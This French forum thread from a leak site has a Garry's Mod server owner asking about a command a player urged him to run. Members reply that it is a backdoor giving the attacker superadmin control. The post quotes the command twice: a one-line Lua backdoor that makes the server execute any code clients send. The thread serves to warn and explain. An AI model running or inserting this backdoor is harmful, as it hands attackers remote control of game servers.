• Salut Visiteur ! ✌
    Découvre nos partenaires officiels avec VeryLeak's. Des choix réfléchis, dignes de confiance pour tes avantages.

    StoryFound | REFUNDER TEAM

    StoryFound

    Rejoindre le Canal ✨ ou Plus d'information 📃

    Une question ? Rejoingnez nos différents canaux (Discord, Telegram, Revolt)

    Nos Canaux Communautaires

    Cet affichage peut se clôturer définitivement via la croix en haut à droite.

Un joueur m'a demandé d'entrer une commande sur mon serveur Garry's Mod

Veen_official

VeryLeak's Unique Member 👑
Level 1

Torrents Stats

Messages
12
J'aime
0
Trophées
351
Inscrit
11 Novembre 2017
Bonjours à tous !
Voilà, hier sur mon serveur Garry's Mod, un joueur ma demandé d'entrer une commande, celle-ci :
ulx luarun util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
Bien évidement je ne l'ai pas fait. Je suppose que c'était une backdoor.

Pouvez vous m'en dire plus sur cette "Backdoor", comment elle fonctionne, ce qu'elle provoque, ect...

S'il vous plait ?
J'ai également trouver cette vidéo sur un forum qui apparemment, a donné la commande à un admin et il a put "prendre le contrôle du serveur".
Merci d'avance !
 

Anima's Leak

VeryLeak's Unique Member 👑
Level 4

Torrents Stats

Messages
124
J'aime
664
Trophées
623
Inscrit
5 Juin 2017
jsp si c'est ce que ça produit mais ça ressemble à ça le code
Link Removed

EDIT: enfaites à la base c'est un mod menu qui fait ça et lorsque tu tape cette commande quand tu peux ulx luarun et ben ça met le hackeur superadmin

et si tu l'avais taper il aurait acces a ton serveur et pourrai le détruire (ban, unban, kick....)
 

One.

Administrator/Dev
Administrateur
Level 5

Torrents Stats

Messages
750
J'aime
5 799
Trophées
1 869
Inscrit
24 Décembre 2015
Bonjours à tous !
Voilà, hier sur mon serveur Garry's Mod, un joueur ma demandé d'entrer une commande, celle-ci :
ulx luarun util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
Bien évidement je ne l'ai pas fait. Je suppose que c'était une backdoor.

Pouvez vous m'en dire plus sur cette "Backdoor", comment elle fonctionne, ce qu'elle provoque, ect...

S'il vous plait ?
J'ai également trouver cette vidéo sur un forum qui apparemment, a donné la commande à un admin et il a put "prendre le contrôle du serveur".
Merci d'avance !
Backdoor pour exploit ce qu'on veut
 

Veen_official

VeryLeak's Unique Member 👑
Level 1

Torrents Stats

Messages
12
J'aime
0
Trophées
351
Inscrit
11 Novembre 2017
Ok Mercio beaucoup
 
C

Certurix

Deleted Member
Tient, je pense que ça intéresserait certains fondateurs de ban cette personne . As-tu son steam id ?
 
Haut Bas